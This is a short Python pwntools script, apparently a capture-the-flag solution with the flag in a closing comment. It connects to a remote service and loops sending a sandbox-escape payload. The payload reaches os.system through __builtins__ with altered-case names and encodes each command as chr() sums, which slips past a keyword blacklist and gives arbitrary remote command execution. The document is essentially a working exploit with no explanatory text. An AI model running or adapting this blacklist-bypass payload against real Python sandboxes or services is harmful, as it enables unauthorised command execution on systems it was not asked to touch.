from pwn import * blacklisted = ['cat','grep','nano','import','eval','subprocess','input','sys','execfile','open','exec','for','dir','file','input','write','while','echo','print','int','os','read'] ip = '143.198.184.186' port = 45458 proc = remote(ip, port) print(proc.recv().decode('latin-1')) def valid(cmd): safe = True for char in str(cmd): if not (ord(char)>=33 and ord(char)<=126): safe = False print('Badchar !! '+char) for badword in blacklisted: if badword in str(cmd): safe = False print("You used a bad word!") return safe def rce(): # Get User Input data = input().strip("\n") # Payload final = b"__builtins__.__dict__['__IMPORT__'.lower()]('OS'.lower()).__dict__['SYSTEM'.lower()](" for i in range(len(data)-1): final += bytes('chr('+str(ord(data[i]))+')+', 'utf-8') final += bytes('chr('+str(ord(data[len(data)-1]))+')', 'utf-8') final += b")" if valid(final): # Send Payload proc.sendline(final) # Print Response print(proc.recv().decode('latin-1')) else: print("You used a bad word!") while(True): rce() # kqctf{0h_h0w_1_w4n7_70_br34k_fr33_2398d89vj3nsoicifh3bdoq1b39049v}